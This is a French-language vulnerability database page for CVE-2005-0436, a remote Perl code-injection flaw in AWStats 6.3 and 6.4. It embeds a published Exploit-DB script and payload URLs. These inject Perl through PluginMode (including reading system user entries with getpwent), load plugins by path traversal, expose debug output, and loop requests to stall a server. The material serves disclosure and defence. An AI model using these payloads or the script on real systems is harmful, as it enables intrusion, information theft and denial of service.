CVE-2005-0436 : Détail

CVE-2005-0436

0.92%V3
Network
2005-02-15
04h00 +00:00
2017-07-10
12h57 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Direct code injection vulnerability in awstats.pl in AWStats 6.3 and 6.4 allows remote attackers to execute portions of Perl code via the PluginMode parameter.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P [email protected]

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 817

Date de publication : 2005-02-13 23h00 +00:00
Auteur : GHC
EDB Vérifié : Yes

#!/usr/bin/perl # # # Summarized the advisory www.ghc.ru GHC: /str0ke # # [0] Exploitable example (raw log plugin): # Attacker can read sensitive information # # http://server/cgi-bin/awstats-6.4/awstats.pl?pluginmode=rawlog&loadplugin=rawlog # # [1] Perl code execution. (This script) # # http://server/cgi-bin/awstats-6.4/awstats.pl?&PluginMode=:print+getpwent # # [2] Arbitrary plugin including. # # http://server/cgi-bin/awstats-6.4/awstats.pl?&loadplugin=../../../../usr/libdata/perl/5.00503/blib # # [3] Sensetive information leak in AWStats version 6.3(Stable) - 6.4(Development). # Every user can access debug function: # # http://server/cgi-bin/awstats-6.4/awstats.pl?debug=1 # http://server/cgi-bin/awstats-6.4/awstats.pl?debug=2 # # Be sure to change the $server + /cgi-bin location /str0ke # use IO::Socket; $server = 'www.example.com'; sub ConnectServer { $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80") || die "Error\n"; print $socket "GET /cgi-bin/awstats-6.4/awstats.pl?&hack=$rp&PluginMode=:sleep HTTP/1.1\n"; print $socket "Host: $server\n"; print $socket "Accept: */*\n"; print $socket "\n\n"; } while () { $rp = rand; &ConnectServer; } # milw0rm.com [2005-02-14]

Products Mentioned

Configuraton 0

Awstats>>Awstats >> Version 6.3

Awstats>>Awstats >> Version 6.4

Références

http://secunia.com/advisories/14299
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/archive/1/390368
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.osvdb.org/13832
Tags : vdb-entry, x_refsource_OSVDB